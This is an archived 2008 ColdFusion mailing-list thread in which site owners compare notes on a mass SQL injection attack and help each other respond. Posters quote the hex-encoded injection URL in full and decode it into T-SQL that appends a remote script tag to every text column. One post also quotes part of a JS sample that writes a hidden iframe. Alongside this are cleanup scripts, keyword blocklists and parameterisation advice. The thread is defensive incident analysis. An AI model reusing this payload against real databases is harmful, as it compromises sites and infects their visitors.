specific data types, its real power is in this separation of data from code.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309394
> Yeah, that suck, I was going to dissect it. It appears that
> DNS is resolving it to 127.0.0.1. I didn't know you could do
> that. verynx.cn resolves to 121.12.169.186, but it returns a
> 404 when I submit a GET for w.js.
Here's a sample, from another .js file used:
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(
n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("dssndd=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "dssndd=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://lodse.ru/cgi-bin/index.cgi?ad width=0
height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}}
The URL in the iframe appears to simply redirect to msn.com. So, it looks
like the purpose of the attack is click-fraud.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Kris Jones
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309393
I can confirm that many templates in our site are being hit. And they
are not commonly named.
-KJ
> For me, all attempts are focusing on rss.cfm. Another post said they saw
> sitemap.cfm being hit. Can anyone confirm any other templates that are being
> hit? Perhaps only 'commonly named' templates are being
hit?
Author: Cameron Johnson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309391
We got hit, and, according to the IIS logs, they hit non-standard templates in
varied directories:
/indexPrint.cfm
/events/institute.cfm
/search/TaxonomyResults.cfm
/conferences/article.cfm
/applications/statsmap/detail.cfm
I don't see much of a pattern.
Cameron
>For me, all attempts are focusing on rss.cfm. Another post said they saw
>sitemap.cfm being hit. Can anyone confirm any other templates that are being
>hit? Perhaps only 'commonly named' templates are being hit?
>
>Che
Author: Mark Atkinson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309387
We've been dealing with these too - to address Che's question they were
crawling here for pages with query strings but not much else - as well
as our implementing solutions offered here (much appreciation to all),
our net. admin. simply shut down these attacks at the firewall -
Sonicwall is the name of our firewall and it apparently updates every
ten minutes to include defenses against things like this. Our logs are
very clean now - although DB's a mess. :-) N.A. left for the day before
I got back to email but I will attempt to discover what he did and post
here.
HTH
Mark
Che Vilnonis wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Jerry Johnson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309388
The attempts are based on a google search of .cfm files with parameters that
can be exploited.
(They have automated the page search, as well as the attack itself.)
It is not a cf specific attack, but is also nailing php, asp, and .net
sites.
Here is a decent writeup of it all.
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
> For me, all attempts are focusing on rss.cfm. Another post said they saw
> sitemap.cfm being hit. Can anyone confirm any other templates that are
> being
> hit? Perhaps only 'commonly named' templates are being hit?
>
Author: Jerry Johnson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309386
I have all of the js files open and saved to a text file, fwiw, from this
morning.
On Mon, Jul 21, 2008 at 3:24 PM, Claude Schneegans <
schneegans@internetique.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309385
Easy. sp_executesql
The point here is, you can spend a lifetime guessing every bad way a
hacker can ruin your database. The root cause however is that your
input is not bound to a parameter in your SQL statement. Cfqueryparam
closes that hole for good. Whether you want to ban people IPs a and
junk us up to you, but that can be a slipperly slope when you start
banning legit people because they typed the word "execute" into a
comments form.
~Brad
I'm just talking about executing SQL, not SQL injection methods.
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309384
For me, all attempts are focusing on rss.cfm. Another post said they saw
sitemap.cfm being hit. Can anyone confirm any other templates that are being
hit? Perhaps only 'commonly named' templates are being hit?
Che
Author: Bryan Stevenson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309383
....and all hackers ALWAYS use the same IP....cause they'd never get
caught that way...hehe
yes...that was meant to be sarcastic ;-)
I see where you're coming from Claude, I just think (as Dave appears to)
that you're wasting your time....let CFQUERYPARAM do what it's meant to.
Cheers
-
Bryan Stevenson B.Comm.
VP & Director of E-Commerce Development
Electric Edge Systems Group Inc.
phone: 250.480.0642
fax: 250.480.1264
cell: 250.920.8830
e-mail: bryan@electricedgesystems.com
web: www.electricedgesystems.com
Notice:
This message, including any attachments, is confidential and may contain
information that is privileged or exempt from disclosure. It is intended
only for the person to whom it is addressed unless expressly authorized
otherwise by the sender. If you are not an authorized recipient, please
notify the sender immediately and permanently destroy all copies of this
message and attachments.
On Mon, 2008-07-21 at 15:39 -0400, Claude Schneegans wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309381
I'm just talking about executing SQL, not SQL injection methods.
>>What other ways are there? I know of two: EXEC and EXECUTE
"http" (http injection) and "user" (SQL injection) are classics.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com) Thanks.
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309379
And embedded in his code is one of the "other" ways of executing SQL - using
sp_executeSQL .... His script is better than mine I think.
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Just an FYI...
Our DBA (Ryan Cooper) took this same route and this is what he came up with.
Thought I'd share this with the group on his behalf. He notes that you need
to run this on each of your databases:
-- start
CREATE TABLE [dbo].[Infected](
[TableName] [varchar](255) NULL,
[ColumnName] [varchar](4000) NULL
);
DECLARE @T nvarchar(255)
DECLARE @C nvarchar(4000)
DECLARE @SQL nvarchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,
b.name
from sysobjects a,syscolumns b
where a.id=b.id
and a.xtype='u'
and (b.xtype=99
or b.xtype=35
or b.xtype=231
or b.xtype=167)
open Table_Cursor
fetch next from Table_Cursor into @T,@C
while @@fetch_status = 0
begin
set @SQL = 'DECLARE @V varchar(4000); SET @V = NULL; SELECT
TOP 1 @V = ' + @C + ' FROM ' + @T + ' WHERE '+@C+' LIKE
''%</title><script
src="http://1.verynx.cn/w.js">;%''; IF (@V IS NOT NULL) BEGIN
INSERT INTO
dbo.Infected (tableName, ColumnName) VALUES ('''+@T+''','''+@C+''') END'
PRINT @SQL
EXECUTE sp_executesql @SQL
fetch next from Table_Cursor into @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
-- end
The hacker's hope is that you will be outputting one of those varchar fields
into a webpage without escaping HTML characters. The extra text being
inserted into the database fields will include a malicious JavaScript file
from another server into the webpage. I haven't looked at the JS to see
what it does, but it probably tries to load some Trojan via an active X
applet or something.
To clean your database, I would recommend reverse-engineering the attack to
loop over your database columns and remove the text they placed in there.
In the mean time, shut your site down so you don't infect your customers.
~Brad
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309380
>>What other ways are there? I know of two: EXEC and EXECUTE
"http" (http injection) and "user" (SQL injection) are classics.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309377
Brad/dave,
Back when it was working the script did little more than insert a link inot
the page that sent the user to a tageted "links" site/page... In other words
it was a basic spam traffic generator - at least the ones on our sites.
-mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
For what it's worth, the specific URL that was injected in the sample I saw
(http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name
doesn't resolve.
===============
Yeah, that suck, I was going to dissect it. It appears that DNS is
resolving it to 127.0.0.1. I didn't know you could do that. verynx.cn
resolves to 121.12.169.186, but it returns a 404 when I submit a GET for
w.js.
Hmm, some off-shore joint. "Asia Pacific Network Information Centre"
owns the IP the domain resolves to. Shows up as possibly being in Bejing,
China.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309378
>>That's fine, until the attack pattern contains something else, like
Unicode
sequences.
Not from the same address though, because it is banned now.
And the purpose of my code is not to replace CFQUERYPARAM.
It is to add an extra feature that will not only protect the database,
but ALSO
the whole site, because the guy won't be able to open any other page.
>>Figuring out what patterns to deny is a losing battle.
Look at what <CFQUERYPARAM CFSQLType = "CF_SQL_INTEGER "... does:
It triggers an error if the parameter is not an integer.
My code does exactly the same thing, PLUS it bans the intruder in case
some known attack pattern is detected.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309375
I took the time to save out all of the code from the JS file that was
inserted.
Anyone that would like this code, please contact me off list and I'll be
happy to zip it up for you.
>>For what it's worth, the specific URL that was injected in the sample I
saw
(http://1.verynx.cn/w.js) doesn't seem to work anymore. The
server name
doesn't resolve.
===============
Yeah, that suck, I was going to dissect it.
It is broken now, but this morning I was able to see the code.
Apparently all it was doing was to document.write some code containing an
iFrame with an address to another Chinese site:
http://ll80.com/.
I've opened the site, but it is all Chinese for me ;-)
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com) Thanks.
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309376
We're getting hit with this attack via a wide range of hosted domains, and
various files. Sitemap.cfm is a common one at this point.
andy
>>We're getting hit hard today with this.
>>/rss.cfm?
Is is just rss.cfm? I haven't looked at our logs yet. Where did you see
this. The server log files?
~~G~~
> We're getting hit hard today with this. They're failing, because we
> use cfqueryparam and cfprocparam. But it is quite annoying.
>
> -KJ
>
>
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309374
Just an FYI...
Our DBA (Ryan Cooper) took this same route and this is what he came up with.
Thought I'd share this with the group on his behalf. He notes that you need
to run this on each of your databases:
-- start
CREATE TABLE [dbo].[Infected](
[TableName] [varchar](255) NULL,
[ColumnName] [varchar](4000) NULL
);
DECLARE @T nvarchar(255)
DECLARE @C nvarchar(4000)
DECLARE @SQL nvarchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,
b.name
from sysobjects a,syscolumns b
where a.id=b.id
and a.xtype='u'
and (b.xtype=99
or b.xtype=35
or b.xtype=231
or b.xtype=167)
open Table_Cursor
fetch next from Table_Cursor into @T,@C
while @@fetch_status = 0
begin
set @SQL = 'DECLARE @V varchar(4000); SET @V = NULL; SELECT
TOP 1 @V = ' + @C + ' FROM ' + @T + ' WHERE '+@C+' LIKE
''%</title><script
src="http://1.verynx.cn/w.js">;%''; IF (@V IS NOT NULL) BEGIN
INSERT INTO
dbo.Infected (tableName, ColumnName) VALUES ('''+@T+''','''+@C+''') END'
PRINT @SQL
EXECUTE sp_executesql @SQL
fetch next from Table_Cursor into @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
-- end
The hacker's hope is that you will be outputting one of those varchar fields
into a webpage without escaping HTML characters. The extra text being
inserted into the database fields will include a malicious JavaScript file
from another server into the webpage. I haven't looked at the JS to see
what it does, but it probably tries to load some Trojan via an active X
applet or something.
To clean your database, I would recommend reverse-engineering the attack to
loop over your database columns and remove the text they placed in there.
In the mean time, shut your site down so you don't infect your customers.
~Brad
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309373
Dave...
What other ways are there? I know of two: EXEC and EXECUTE.
----- Excess quoted text cut - see Original Post for more -----
That would stop this specific problem, but would be easily circumvented by
using one of the other mechanisms for executing strings on SQL Server.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized instruction
at our training centers in Washington DC, Atlanta, Chicago, Baltimore,
Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309372
For those of you who have been hit by this attack and who need to try
something short of restoring your DB, this script will generate a series of
update statements in reverse of the hack that's been going around:
-----------------------------------------------------------
DECLARE @T varchar(255), @C varchar(255)
DECLARE @sql varchar(4000)
DECLARE @script varchar(255)
/*fill in the value of the malicious script. */
select @script = '<script src="*scriptsrc"></script><!---'
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u'
AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
SELECT @sql = 'update [' + @T +'] set ['+ @C +'] = Replace([' +
@C + '],''' + @script + ''','''')'
PRINT @sql
/*uncomment this after checking the output using print */
--EXEC(@sql)
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
-------------------------------------------------------
1) Replace the value of @script (the select at the top) with the value of
the string that's been inserted into your DB
2) Run the script AS IS - you should see a list of "update" statements that
look like this:
update [**tablename] set [**columnName] = Replace([**ColumnName],'<script
src="*scriptsrc"></script><!---','')
Where **tablename and **columname represent actual tables/columns from your
DB.
You can then run the updates individually to strip out the malicious code...
I also converted the update to a select to compare the values and see what
the result would be on update.
3) If you are brave you can comment out the "EXEC(@sql)" line and rerun the
script. Doing so will hit every table and every char column with these
updates so be sure you know what you are doing.
-Mark
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309371
----- Excess quoted text cut - see Original Post for more -----
That's fine, until the attack pattern contains something else, like Unicode
sequences. Figuring out what patterns to deny is a losing battle. It's much
more efficent to simply allow only acceptable actions, which is what
CFQUERYPARAM does.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309370
>>For what it's worth, the specific URL that was injected in the sample I
saw
(http://1.verynx.cn/w.js) doesn't seem to work anymore. The
server name
doesn't resolve.
===============
Yeah, that suck, I was going to dissect it.
It is broken now, but this morning I was able to see the code.
Apparently all it was doing was to document.write some code containing
an iFrame with an address to another Chinese site:
http://ll80.com/.
I've opened the site, but it is all Chinese for me ;-)
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309368
>>If several people on this list are seeing this attack, it must be pretty
widespread.
Until now, I just check for strings "http" or "user" in url.id
containing something else than an integer value.
I now just added "DECLARE" in the validation.
All my templates expecting id=<some numeric>
start with this code (included):
<CFIF val(id) EQ 0 AND (id CONTAINS "http" OR id CONTAINS "user" OR id
CONTAINS "DECLARE")>
... save IP of this guy in the banned addresses table...
</CFIF>
This is even more efficient than CFQURYPARAM, because this way I'm sure
the guy will not have another chance.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309369
For what it's worth, the specific URL that was injected in the sample I
saw
(http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name
doesn't resolve.
===============
Yeah, that suck, I was going to dissect it. It appears that DNS is
resolving it to 127.0.0.1. I didn't know you could do that. verynx.cn
resolves to 121.12.169.186, but it returns a 404 when I submit a GET for
w.js.
Hmm, some off-shore joint. "Asia Pacific Network Information Centre"
owns the IP the domain resolves to. Shows up as possibly being in
Bejing, China.
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309367
----- Excess quoted text cut - see Original Post for more -----
For what it's worth, the specific URL that was injected in the sample I saw
(http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name
doesn't resolve.
Second, if you can restore a previous copy of the database, that might be
easier.
Also, I'd recommend that you identify the problem scripts that contain the
vulnerability before you restore the database. Otherwise, you might have to
repeat the process.
Finally, you might consider implementing filtering at the web server to
block long (and presumably problematic) URLs before they're even sent to CF.
If you're using IIS, you can do that with the latest version of URLScan. If
you're using Apache, I think mod_security will let you do this.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309366
The hacker's hope is that you will be outputting one of those varchar
fields into a webpage without escaping HTML characters. The extra text
being inserted into the database fields will include a malicious
JavaScript file from another server into the webpage. I haven't looked
at the JS to see what it does, but it probably tries to load some Trojan
via an active X applet or something.
To clean your database, I would recommend reverse-engineering the attack
to loop over your database columns and remove the text they placed in
there. In the mean time, shut your site down so you don't infect your
customers.
~Brad
We had the same hack on our site, did you guys figure out exactly what
happened or how and where the sql was ran? or what the hackers purpose
was?
Author: Wayne Janeck
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309365
We had the same hack on our site, did you guys figure out exactly what happened
or how and where the sql was ran? or what the hackers purpose was?
Author: james carberry
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309364
Just put the following line at the TOP of your application.cfm to innoculate your
CF webs against this attack:
<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR
cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>
peace, j
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309362
> Even easier than monkeying with every single one of your
----- Excess quoted text cut - see Original Post for more -----
That would stop this specific problem, but would be easily circumvented by
using one of the other mechanisms for executing strings on SQL Server.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309363
Band-Aids and duct tape...
Filtering for known attacks: moderately useful as a stop gap if you are
in the middle of an attack.
Holistic approach to seal the original vulnerability against ALL current
and future attacks (cfqueryparam): highly desirable.
~Brad
Even easier than monkeying with every single one of your cfquery's....
just add following line to the TOP of all your application.cfm's:
<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC("
OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>
This will immediately shut down execution of any CFM that this piece of
trash tries to invoke to execute this particular type of SQL for.
peace, j
Author: Kris Jones
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309361
It'll show in your logs of course. We also have error reports that
dump the error info and certain collections and mail it to the dev
team.
-KJ
----- Excess quoted text cut - see Original Post for more -----
Author: james carberry
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309360
Even easier than monkeying with every single one of your cfquery's.... just add
following line to the TOP of all your application.cfm's:
<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR
cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>
This will immediately shut down execution of any CFM that this piece of trash
tries to invoke to execute this particular type of SQL for.
peace, j
----- Excess quoted text cut - see Original Post for more -----
Author: james carberry
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309359
----- Excess quoted text cut - see Original Post for more -----
>CHAR(4000));EXEC(@S);
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309358
Sweet nectar... I'm trying this out and blogging it tonight. If it's
pretty easy to run I think we should promote an international check your
freakin' cfqueries day! Who want to buy the party hats and streamers?
~Brad
I was just looking into that myself.
http://qpscanner.riaforge.org/
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309357
+1
Good idea!
Good on ya, mate. If there were an award for using cfqueryparam I would
give it to you.
Since this seems to be such a hot topic right now, has anyone heard of a
CFML code scanner to check for vulnerable cfqueries kind of like the var
scoper does?
Maybe we should write one to promote security in the CF community.
~Brad
We're getting hit hard today with this. They're failing, because we use
cfqueryparam and cfprocparam. But it is quite annoying.
-KJ
Author: Joshua Cyr
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309356
I was just looking into that myself.
http://qpscanner.riaforge.org/
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309355
Good on ya, mate. If there were an award for using cfqueryparam I would
give it to you.
Since this seems to be such a hot topic right now, has anyone heard of a
CFML code scanner to check for vulnerable cfqueries kind of like the var
scoper does?
Maybe we should write one to promote security in the CF community.
~Brad
We're getting hit hard today with this. They're failing, because we
use cfqueryparam and cfprocparam. But it is quite annoying.
-KJ
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309353
>>We're getting hit hard today with this.
>>/rss.cfm?
Is is just rss.cfm? I haven't looked at our logs yet. Where did you see
this. The server log files?
~~G~~
> We're getting hit hard today with this. They're failing, because we
> use cfqueryparam and cfprocparam. But it is quite annoying.
>
> -KJ
Author: Kris Jones
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309351
We're getting hit hard today with this. They're failing, because we
use cfqueryparam and cfprocparam. But it is quite annoying.
-KJ
Author: Josh Nathanson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309349
I am seeing these too on our site, in errors generated by bad data going
into a cfqueryparam.
If several people on this list are seeing this attack, it must be pretty
widespread.
-- Josh
----- Excess quoted text cut - see Original Post for more -----
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309348
Mutha!!!
Our company JUST had this happen. We're working through it right now.
Thanks for the confirmation guys. Appreciated.
Works great for me. You have to remove the extra line breaks though.
Here is what it does:
Did you read the blog I posted? It explains it all.
Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.
/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263
6861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5220
464F
522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563
7473
20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420
612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E7874797065
3D33
35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F5045
4E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F
4375
72736F7220494E544F2040542C4043205748494C4528404046455443485F535441545553
3D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B27
2B40
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372
633D
22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C
212D
2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F746974
6C65
3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A
7322
3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D202054
6162
6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C65
5F43
7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS
CHAR(4000));EXEC(@S);
>>Why bother looking around the internet? Use your SQL server to decode
it!
Huh... Learn sumptin new every day. That is why I keep coming back here.
;)
Thanx Brad.
~G~
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309346
>>Drop database foo
>> Crap, I just let another one slip. Brace yourself for another wave of
attacks... :)
Lets not forget what a mess Little Bobby Tables made.
http://xkcd.com/327/
--
"If everything seems under control, you're not going fast enough"
-- Mario Andretti
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309343
Yep, read the post. Must have been the line breaks that messed things up.
Works great for me. You have to remove the extra line breaks though.
Here is what it does:
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309340
I appreciate your concern, but I'm pretty certain the bad people out
there wanting to use this already know how to do it if they haven't
already.
One doesn't have to be too creative to come up with unique ways of
screwing with databases.
Drop database foo
Crap, I just let another one slip. Brace yourself for another wave of
attacks... :)
~Brad
Good point. My bad...
Can we please stop distributing this script ;)
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309338
Works great for me. You have to remove the extra line breaks though.
Here is what it does:
DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,
b.name
from sysobjects a,syscolumns b
where a.id=b.id
and a.xtype='u'
and (b.xtype=99
or b.xtype=35
or b.xtype=231
or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script
src="http://1.verynx.cn/w.js"></script><;!--''
where '+@C+' not like ''%"></title><script
src="http://1.verynx.cn/w.js"></script><;!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Did you read the blog I posted? It explains it all.
Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.
/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263
6861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5220
464F
522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563
7473
20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420
612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E7874797065
3D33
35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F5045
4E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F
4375
72736F7220494E544F2040542C4043205748494C4528404046455443485F535441545553
3D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B27
2B40
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372
633D
22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C
212D
2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F746974
6C65
3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A
7322
3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D202054
6162
6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C65
5F43
7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS
CHAR(4000));EXEC(@S);
>>Why bother looking around the internet? Use your SQL server to decode
it!
Huh... Learn sumptin new every day. That is why I keep coming back here.
;)
Thanx Brad.
~G~
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309337
Good point. My bad...
Can we please stop distributing this script ;)
Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.
/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263
6861
Author: Dave Francis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309336
Can we please stop distributing this script ;)
Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.
/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263
6861
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309335
Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.
/rss.cfm?';DECLARE @S CHAR(4000);SET
